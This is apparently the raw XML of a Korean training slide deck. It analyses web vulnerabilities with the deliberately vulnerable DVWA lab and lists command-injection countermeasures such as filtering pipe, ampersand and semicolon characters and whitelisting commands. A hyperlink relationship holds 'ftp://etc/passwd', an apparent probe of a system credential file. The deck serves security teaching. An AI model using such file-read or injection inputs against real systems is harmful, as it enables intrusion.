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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="271" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="521" r:id="rId4"/>
    <p:sldId id="490" r:id="rId5"/>
    <p:sldId id="585" r:id="rId6"/>
    <p:sldId id="586" r:id="rId7"/>
    <p:sldId id="523" r:id="rId8"/>
    <p:sldId id="587" r:id="rId9"/>
    <p:sldId id="588" r:id="rId10"/>
    <p:sldId id="589" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="590" r:id="rId18"/>
    <p:sldId id="591" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="592" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="593" r:id="rId24"/>
    <p:sldId id="287" r:id="rId25"/>
    <p:sldId id="289" r:id="rId26"/>
    <p:sldId id="594" r:id="rId27"/>
    <p:sldId id="595" r:id="rId28"/>
    <p:sldId id="262" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="279" r:id="rId32"/>
    <p:sldId id="281" r:id="rId33"/>
    <p:sldId id="282" r:id="rId34"/>
    <p:sldId id="524" r:id="rId35"/>
    <p:sldId id="642" r:id="rId36"/>
    <p:sldId id="643" r:id="rId37"/>
    <p:sldId id="644" r:id="rId38"/>
    <p:sldId id="645" r:id="rId39"/>
    <p:sldId id="646" r:id="rId40"/>
    <p:sldId id="647" r:id="rId41"/>
    <p:sldId id="648" r:id="rId42"/>
    <p:sldId id="649" r:id="rId43"/>
    <p:sldId id="650" r:id="rId44"/>
    <p:sldId id="651" r:id="rId45"/>
    <p:sldId id="652" r:id="rId46"/>
    <p:sldId id="653" r:id="rId47"/>
    <p:sldId id="654" r:id="rId48"/>
    <p:sldId id="655" r:id="rId49"/>
    <p:sldId id="596" r:id="rId50"/>
    <p:sldId id="597" r:id="rId51"/>
    <p:sldId id="598" r:id="rId52"/>
    <p:sldId id="599" r:id="rId53"/>
    <p:sldId id="600" r:id="rId54"/>
    <p:sldId id="601" r:id="rId55"/>
    <p:sldId id="602" r:id="rId56"/>
    <p:sldId id="603" r:id="rId57"/>
    <p:sldId id="604" r:id="rId58"/>
    <p:sldId id="605" r:id="rId59"/>
    <p:sldId id="606" r:id="rId60"/>
    <p:sldId id="607" r:id="rId61"/>
    <p:sldId id="608" r:id="rId62"/>
    <p:sldId id="609" r:id="rId63"/>
    <p:sldId id="610" r:id="rId64"/>
    <p:sldId id="628" r:id="rId65"/>
    <p:sldId id="613" r:id="rId66"/>
    <p:sldId id="615" r:id="rId67"/>
    <p:sldId id="616" r:id="rId68"/>
    <p:sldId id="617" r:id="rId69"/>
    <p:sldId id="618" r:id="rId70"/>
    <p:sldId id="619" r:id="rId71"/>
    <p:sldId id="629" r:id="rId72"/>
    <p:sldId id="620" r:id="rId73"/>
    <p:sldId id="621" r:id="rId74"/>
    <p:sldId id="637" r:id="rId75"/>
    <p:sldId id="640" r:id="rId76"/>
    <p:sldId id="623" r:id="rId77"/>
    <p:sldId id="632" r:id="rId78"/>
    <p:sldId id="633" r:id="rId79"/>
    <p:sldId id="625" r:id="rId80"/>
    <p:sldId id="634" r:id="rId81"/>
    <p:sldId id="635" r:id="rId82"/>
    <p:sldId id="636" r:id="rId83"/>
    <p:sldId id="627" r:id="rId84"/>
    <p:sldId id="656" r:id="rId85"/>
    <p:sldId id="657" r:id="rId86"/>
    <p:sldId id="658" r:id="rId87"/>
    <p:sldId id="659" r:id="rId88"/>
    <p:sldId id="660" r:id="rId89"/>
    <p:sldId id="661" r:id="rId90"/>
    <p:sldId id="662" r:id="rId91"/>
    <p:sldId id="663" r:id="rId92"/>
    <p:sldId id="664" r:id="rId93"/>
    <p:sldId id="665" r:id="rId94"/>
    <p:sldId id="666" r:id="rId95"/>
    <p:sldId id="667" r:id="rId96"/>
    <p:sldId id="668" r:id="rId97"/>
    <p:sldId id="669" r:id="rId98"/>
    <p:sldId id="670" r:id="rId99"/>
    <p:sldId id="671" r:id="rId100"/>
    <p:sldId id="672" r:id="rId101"/>
    <p:sldId id="673" r:id="rId102"/>
    <p:sldId id="674" r:id="rId103"/>
    <p:sldId id="675" r:id="rId104"/>
    <p:sldId id="676" r:id="rId105"/>
    <p:sldId id="677" r:id="rId106"/>
    <p:sldId id="678" r:id="rId107"/>
    <p:sldId id="679" r:id="rId108"/>
    <p:sldId id="680" r:id="rId109"/>
    <p:sldId id="681" r:id="rId110"/>
    <p:sldId id="682" r:id="rId111"/>
    <p:sldId id="683" r:id="rId112"/>
    <p:sldId id="684" r:id="rId113"/>
    <p:sldId id="685" r:id="rId114"/>
    <p:sldId id="686" r:id="rId115"/>
    <p:sldId id="687" r:id="rId116"/>
    <p:sldId id="688" r:id="rId117"/>
    <p:sldId id="689" r:id="rId118"/>
    <p:sldId id="690" r:id="rId119"/>
    <p:sldId id="691" r:id="rId120"/>
    <p:sldId id="692" r:id="rId121"/>
    <p:sldId id="693" r:id="rId122"/>
    <p:sldId id="694" r:id="rId123"/>
    <p:sldId id="290" r:id="rId124"/>
    <p:sldId id="695" r:id="rId125"/>
    <p:sldId id="696" r:id="rId126"/>
    <p:sldId id="697" r:id="rId127"/>
    <p:sldId id="698" r:id="rId128"/>
    <p:sldId id="280" r:id="rId129"/>
    <p:sldId id="699" r:id="rId130"/>
    <p:sldId id="700" r:id="rId131"/>
    <p:sldId id="701" r:id="rId132"/>
    <p:sldId id="702" r:id="rId133"/>
    <p:sldId id="703" r:id="rId134"/>
    <p:sldId id="704" r:id="rId135"/>
    <p:sldId id="705" r:id="rId136"/>
    <p:sldId id="494" r:id="rId137"/>
    <p:sldId id="495" r:id="rId138"/>
    <p:sldId id="498" r:id="rId139"/>
    <p:sldId id="496" r:id="rId140"/>
    <p:sldId id="499" r:id="rId141"/>
    <p:sldId id="706" r:id="rId142"/>
    <p:sldId id="707" r:id="rId143"/>
    <p:sldId id="297" r:id="rId144"/>
    <p:sldId id="708" r:id="rId145"/>
    <p:sldId id="270" r:id="rId146"/>
    <p:sldId id="709" r:id="rId147"/>
    <p:sldId id="710" r:id="rId148"/>
    <p:sldId id="711" r:id="rId149"/>
    <p:sldId id="292" r:id="rId150"/>
    <p:sldId id="278" r:id="rId151"/>
    <p:sldId id="712" r:id="rId152"/>
    <p:sldId id="713" r:id="rId153"/>
    <p:sldId id="714" r:id="rId154"/>
    <p:sldId id="715" r:id="rId155"/>
    <p:sldId id="716" r:id="rId156"/>
    <p:sldId id="717" r:id="rId157"/>
    <p:sldId id="718" r:id="rId158"/>
    <p:sldId id="291" r:id="rId159"/>
    <p:sldId id="719" r:id="rId160"/>
    <p:sldId id="720" r:id="rId161"/>
    <p:sldId id="293" r:id="rId162"/>
    <p:sldId id="294" r:id="rId163"/>
    <p:sldId id="295" r:id="rId164"/>
    <p:sldId id="296" r:id="rId165"/>
    <p:sldId id="298" r:id="rId166"/>
    <p:sldId id="721" r:id="rId167"/>
    <p:sldId id="299" r:id="rId168"/>
    <p:sldId id="305" r:id="rId169"/>
    <p:sldId id="306" r:id="rId170"/>
    <p:sldId id="307" r:id="rId171"/>
    <p:sldId id="265" r:id="rId172"/>
    <p:sldId id="312" r:id="rId173"/>
    <p:sldId id="313" r:id="rId174"/>
    <p:sldId id="311" r:id="rId175"/>
    <p:sldId id="304" r:id="rId176"/>
    <p:sldId id="310" r:id="rId177"/>
    <p:sldId id="722" r:id="rId178"/>
    <p:sldId id="723" r:id="rId179"/>
    <p:sldId id="497" r:id="rId180"/>
    <p:sldId id="724" r:id="rId181"/>
    <p:sldId id="500" r:id="rId182"/>
    <p:sldId id="725" r:id="rId183"/>
    <p:sldId id="501" r:id="rId184"/>
    <p:sldId id="502" r:id="rId185"/>
    <p:sldId id="504" r:id="rId186"/>
    <p:sldId id="503" r:id="rId187"/>
    <p:sldId id="505" r:id="rId188"/>
    <p:sldId id="506" r:id="rId189"/>
    <p:sldId id="726" r:id="rId190"/>
    <p:sldId id="727" r:id="rId191"/>
    <p:sldId id="517" r:id="rId192"/>
    <p:sldId id="728" r:id="rId193"/>
    <p:sldId id="729" r:id="rId194"/>
    <p:sldId id="730" r:id="rId195"/>
    <p:sldId id="731" r:id="rId196"/>
    <p:sldId id="732" r:id="rId197"/>
    <p:sldId id="733" r:id="rId198"/>
    <p:sldId id="734" r:id="rId199"/>
    <p:sldId id="735" r:id="rId200"/>
    <p:sldId id="736" r:id="rId201"/>
    <p:sldId id="737" r:id="rId202"/>
    <p:sldId id="738" r:id="rId203"/>
    <p:sldId id="739" r:id="rId204"/>
    <p:sldId id="519" r:id="rId205"/>
    <p:sldId id="740" r:id="rId206"/>
    <p:sldId id="741" r:id="rId207"/>
    <p:sldId id="742" r:id="rId208"/>
    <p:sldId id="743" r:id="rId209"/>
    <p:sldId id="744" r:id="rId210"/>
    <p:sldId id="355" r:id="rId211"/>
    <p:sldId id="745" r:id="rId212"/>
    <p:sldId id="357" r:id="rId213"/>
    <p:sldId id="358" r:id="rId214"/>
    <p:sldId id="359" r:id="rId215"/>
    <p:sldId id="360" r:id="rId216"/>
    <p:sldId id="361" r:id="rId217"/>
    <p:sldId id="362" r:id="rId218"/>
    <p:sldId id="363" r:id="rId219"/>
    <p:sldId id="364" r:id="rId220"/>
    <p:sldId id="365" r:id="rId221"/>
    <p:sldId id="366" r:id="rId222"/>
    <p:sldId id="367" r:id="rId223"/>
    <p:sldId id="368" r:id="rId224"/>
    <p:sldId id="369" r:id="rId225"/>
    <p:sldId id="370" r:id="rId226"/>
    <p:sldId id="371" r:id="rId227"/>
    <p:sldId id="372" r:id="rId228"/>
    <p:sldId id="373" r:id="rId229"/>
    <p:sldId id="374" r:id="rId230"/>
    <p:sldId id="375" r:id="rId231"/>
    <p:sldId id="376" r:id="rId232"/>
    <p:sldId id="377" r:id="rId233"/>
    <p:sldId id="746" r:id="rId234"/>
    <p:sldId id="747" r:id="rId235"/>
    <p:sldId id="318" r:id="rId236"/>
    <p:sldId id="350" r:id="rId237"/>
    <p:sldId id="351" r:id="rId238"/>
    <p:sldId id="320" r:id="rId239"/>
    <p:sldId id="748" r:id="rId240"/>
    <p:sldId id="323" r:id="rId241"/>
    <p:sldId id="324" r:id="rId242"/>
    <p:sldId id="325" r:id="rId243"/>
    <p:sldId id="749" r:id="rId244"/>
    <p:sldId id="750" r:id="rId245"/>
    <p:sldId id="751" r:id="rId246"/>
    <p:sldId id="328" r:id="rId247"/>
    <p:sldId id="329" r:id="rId248"/>
    <p:sldId id="330" r:id="rId249"/>
    <p:sldId id="331" r:id="rId250"/>
    <p:sldId id="332" r:id="rId251"/>
    <p:sldId id="333" r:id="rId252"/>
    <p:sldId id="342" r:id="rId253"/>
    <p:sldId id="343" r:id="rId254"/>
    <p:sldId id="752" r:id="rId255"/>
    <p:sldId id="753" r:id="rId256"/>
    <p:sldId id="754" r:id="rId257"/>
    <p:sldId id="755" r:id="rId258"/>
    <p:sldId id="756" r:id="rId259"/>
    <p:sldId id="757" r:id="rId260"/>
    <p:sldId id="758" r:id="rId261"/>
    <p:sldId id="759" r:id="rId262"/>
    <p:sldId id="760" r:id="rId263"/>
    <p:sldId id="761" r:id="rId264"/>
    <p:sldId id="762" r:id="rId265"/>
    <p:sldId id="763" r:id="rId266"/>
    <p:sldId id="764" r:id="rId267"/>
    <p:sldId id="765" r:id="rId268"/>
    <p:sldId id="766" r:id="rId269"/>
    <p:sldId id="767" r:id="rId270"/>
    <p:sldId id="768" r:id="rId271"/>
    <p:sldId id="769" r:id="rId272"/>
    <p:sldId id="770" r:id="rId273"/>
    <p:sldId id="771" r:id="rId274"/>
    <p:sldId id="772" r:id="rId275"/>
    <p:sldId id="773" r:id="rId276"/>
    <p:sldId id="774" r:id="rId277"/>
    <p:sldId id="775" r:id="rId278"/>
    <p:sldId id="776" r:id="rId279"/>
    <p:sldId id="777" r:id="rId280"/>
    <p:sldId id="778" r:id="rId281"/>
    <p:sldId id="779" r:id="rId282"/>
    <p:sldId id="780" r:id="rId283"/>
    <p:sldId id="300" r:id="rId284"/>
    <p:sldId id="301" r:id="rId285"/>
    <p:sldId id="302" r:id="rId286"/>
    <p:sldId id="303" r:id="rId287"/>
    <p:sldId id="781" r:id="rId288"/>
    <p:sldId id="782" r:id="rId289"/>
    <p:sldId id="783" r:id="rId290"/>
    <p:sldId id="784" r:id="rId291"/>
    <p:sldId id="785" r:id="rId292"/>
    <p:sldId id="345" r:id="rId293"/>
    <p:sldId id="346" r:id="rId294"/>
    <p:sldId id="347" r:id="rId295"/>
    <p:sldId id="786" r:id="rId296"/>
    <p:sldId id="787" r:id="rId297"/>
    <p:sldId id="308" r:id="rId298"/>
    <p:sldId id="788" r:id="rId299"/>
    <p:sldId id="789" r:id="rId300"/>
    <p:sldId id="790" r:id="rId301"/>
    <p:sldId id="791" r:id="rId302"/>
    <p:sldId id="315" r:id="rId303"/>
    <p:sldId id="792" r:id="rId304"/>
    <p:sldId id="793" r:id="rId305"/>
    <p:sldId id="379" r:id="rId306"/>
    <p:sldId id="397" r:id="rId307"/>
    <p:sldId id="316" r:id="rId308"/>
    <p:sldId id="317" r:id="rId309"/>
    <p:sldId id="337" r:id="rId310"/>
    <p:sldId id="338" r:id="rId311"/>
    <p:sldId id="339" r:id="rId312"/>
    <p:sldId id="349" r:id="rId313"/>
    <p:sldId id="352" r:id="rId314"/>
    <p:sldId id="353" r:id="rId315"/>
    <p:sldId id="354" r:id="rId316"/>
    <p:sldId id="794" r:id="rId317"/>
    <p:sldId id="795" r:id="rId318"/>
    <p:sldId id="796" r:id="rId319"/>
    <p:sldId id="797" r:id="rId320"/>
    <p:sldId id="798" r:id="rId321"/>
    <p:sldId id="356" r:id="rId322"/>
    <p:sldId id="380" r:id="rId323"/>
    <p:sldId id="384" r:id="rId324"/>
    <p:sldId id="395" r:id="rId325"/>
    <p:sldId id="799" r:id="rId326"/>
    <p:sldId id="800" r:id="rId327"/>
    <p:sldId id="801" r:id="rId328"/>
    <p:sldId id="802" r:id="rId329"/>
    <p:sldId id="803" r:id="rId330"/>
    <p:sldId id="804" r:id="rId331"/>
    <p:sldId id="805" r:id="rId332"/>
    <p:sldId id="806" r:id="rId333"/>
    <p:sldId id="546" r:id="rId334"/>
    <p:sldId id="548" r:id="rId335"/>
    <p:sldId id="549" r:id="rId336"/>
    <p:sldId id="550" r:id="rId337"/>
    <p:sldId id="551" r:id="rId338"/>
    <p:sldId id="536" r:id="rId339"/>
    <p:sldId id="552" r:id="rId340"/>
    <p:sldId id="553" r:id="rId341"/>
    <p:sldId id="554" r:id="rId342"/>
    <p:sldId id="555" r:id="rId343"/>
    <p:sldId id="556" r:id="rId344"/>
    <p:sldId id="557" r:id="rId345"/>
    <p:sldId id="558" r:id="rId346"/>
    <p:sldId id="559" r:id="rId347"/>
    <p:sldId id="560" r:id="rId348"/>
    <p:sldId id="561" r:id="rId349"/>
    <p:sldId id="547" r:id="rId350"/>
    <p:sldId id="562" r:id="rId351"/>
    <p:sldId id="563" r:id="rId352"/>
    <p:sldId id="564" r:id="rId353"/>
    <p:sldId id="258" r:id="rId354"/>
    <p:sldId id="534" r:id="rId355"/>
    <p:sldId id="535" r:id="rId356"/>
    <p:sldId id="273" r:id="rId357"/>
    <p:sldId id="537" r:id="rId358"/>
    <p:sldId id="538" r:id="rId359"/>
    <p:sldId id="539" r:id="rId360"/>
    <p:sldId id="540" r:id="rId361"/>
    <p:sldId id="542" r:id="rId362"/>
    <p:sldId id="541" r:id="rId363"/>
    <p:sldId id="543" r:id="rId364"/>
    <p:sldId id="544" r:id="rId365"/>
    <p:sldId id="545" r:id="rId366"/>
    <p:sldId id="565" r:id="rId367"/>
    <p:sldId id="566" r:id="rId368"/>
    <p:sldId id="321" r:id="rId369"/>
    <p:sldId id="322" r:id="rId370"/>
    <p:sldId id="567" r:id="rId371"/>
    <p:sldId id="319" r:id="rId372"/>
    <p:sldId id="526" r:id="rId373"/>
    <p:sldId id="568" r:id="rId374"/>
    <p:sldId id="569" r:id="rId375"/>
    <p:sldId id="570" r:id="rId376"/>
    <p:sldId id="571" r:id="rId377"/>
    <p:sldId id="572" r:id="rId378"/>
    <p:sldId id="527" r:id="rId379"/>
    <p:sldId id="530" r:id="rId380"/>
    <p:sldId id="529" r:id="rId381"/>
    <p:sldId id="573" r:id="rId382"/>
    <p:sldId id="574" r:id="rId383"/>
    <p:sldId id="575" r:id="rId384"/>
    <p:sldId id="576" r:id="rId385"/>
    <p:sldId id="577" r:id="rId386"/>
    <p:sldId id="578" r:id="rId387"/>
    <p:sldId id="579" r:id="rId388"/>
    <p:sldId id="580" r:id="rId389"/>
    <p:sldId id="581" r:id="rId390"/>
    <p:sldId id="582" r:id="rId391"/>
    <p:sldId id="583" r:id="rId392"/>
    <p:sldId id="584" r:id="rId393"/>
    <p:sldId id="525" r:id="rId39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hee0" initials="e" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="ehee0" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="KITRI" initials="K" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="KITR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E5F"/>
    <a:srgbClr val="B7D7D8"/>
    <a:srgbClr val="EDF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543" autoAdjust="0"/>
    <p:restoredTop sz="86375" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="78" y="6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399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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slide" Target="slides/slide392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slide" Target="slides/slide39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notesMaster" Target="notesMasters/notesMaster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commentAuthors" Target="commentAuthor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400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles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397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37072-8A57-4D8F-8E5E-706A18DAD831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8E30-6D6C-44F2-A0D6-F7FABD7E3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56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279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082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01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2587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065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3553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8192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862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017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73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918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813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736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2511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7115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7050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3591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84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39571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3845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51621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6715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618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40197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215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287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6758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492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49087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93026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082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2010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2960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790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5612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3715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1337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33948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3754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253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8025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02880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686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8351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97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13247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76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94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FC8E30-6D6C-44F2-A0D6-F7FABD7E3342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4853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0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2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8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20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4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2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4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9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5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B7D7D8"/>
          </a:fgClr>
          <a:bgClr>
            <a:srgbClr val="EDF7F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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-19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8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vwa.or.uk/" TargetMode="Externa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2.jp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.com/recaptcha/" TargetMode="Externa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://&#47484;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1.PNG"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#44032;/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hyperlink" Target="ftp://etc/passwd" TargetMode="Externa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hyperlink" Target="http://,https/" TargetMode="External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hyperlink" Target="http://,https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ftp://etc/passw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8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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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1.png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9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9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9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9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9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9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9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9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9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recaptcha/admin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0.png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4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9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9.xml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9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9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9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9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9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9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9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6.png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7.png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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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1.png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3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9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naver.com/" TargetMode="Externa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www.naver.com/" TargetMode="Externa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4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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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1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9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6.pn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4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4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4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5.png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4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9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0.png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4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9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5.png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4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9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9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0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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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9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6.png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2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/dvwa/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3.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4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9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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339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Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339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/Relationships>
</file>

<file path=ppt/slides/_rels/slide3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.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image333.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image344.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339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8.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342.png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be.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9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9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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.xml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4.png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6.png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7.png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8.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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/Relationships>
</file>

<file path=ppt/slides/_rels/slide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1.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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3.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4.png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9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9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2.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9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JP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-57143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19969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DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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를 활용한 주요 취약점 분석</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883EC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6" y="4009144"/>
            <a:ext cx="5278432" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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OWASP API SECURITY Top 10 (2019)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참조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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r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05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설치 및 설정</a:t>
            </a:r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https://dvwa.co.uk/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DVWA.zip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다운로드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DVWA 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설치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33717F2-2044-4336-922A-C7DFE8197F1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8" y="1961080"/>
            <a:ext cx="5922659" cy="468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43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결론 및 대응방안</a:t>
            </a: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대응방안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 algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>1. Command Injection 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Noto Sans"/>
              </a:rPr>
              <a:t>공격을 막기 위해서는 취약 함수들의 사용을 자제 하여 웹 어플리케이션을 구현해야 한다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pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>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Noto Sans"/>
              </a:rPr>
              <a:t>부득이 연산자를 허용한다면 파이프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Noto Sans"/>
              </a:rPr>
              <a:t>( | ), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>앰퍼샌드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Noto Sans"/>
              </a:rPr>
              <a:t> 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Noto Sans"/>
              </a:rPr>
              <a:t>(&amp;),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Noto Sans"/>
              </a:rPr>
              <a:t>세미콜론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Noto Sans"/>
              </a:rPr>
              <a:t>( ; )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Noto Sans"/>
              </a:rPr>
              <a:t>등 시스템 상에서 멀티라인을 지원하는 특수 문자열에 대한 검증을 실시하여 해당 함수에 유해한 값이 전달되지 못하도록 하거나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sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>입력 값을 철저히 검증하여 실행 시키게 구성해야 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800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pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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endParaRPr lang="en-US" altLang="ko-KR" sz="18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endParaRPr lang="en-US" altLang="ko-KR" sz="18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marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>2. 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Noto Sans"/>
              </a:rPr>
              <a:t>화이트 리스트를 구성하여 특정 명령어 혹은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>입력값만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t> 사용 할 수 있도록 설정하는 것이 안전한 방법이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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pPr marL="0" indent="0">
              <a:buNone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4F5A3F-E659-4867-BD68-BAA5147B7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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="306045" y="4597970"/>
            <a:ext cx="6183655" cy="253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529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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
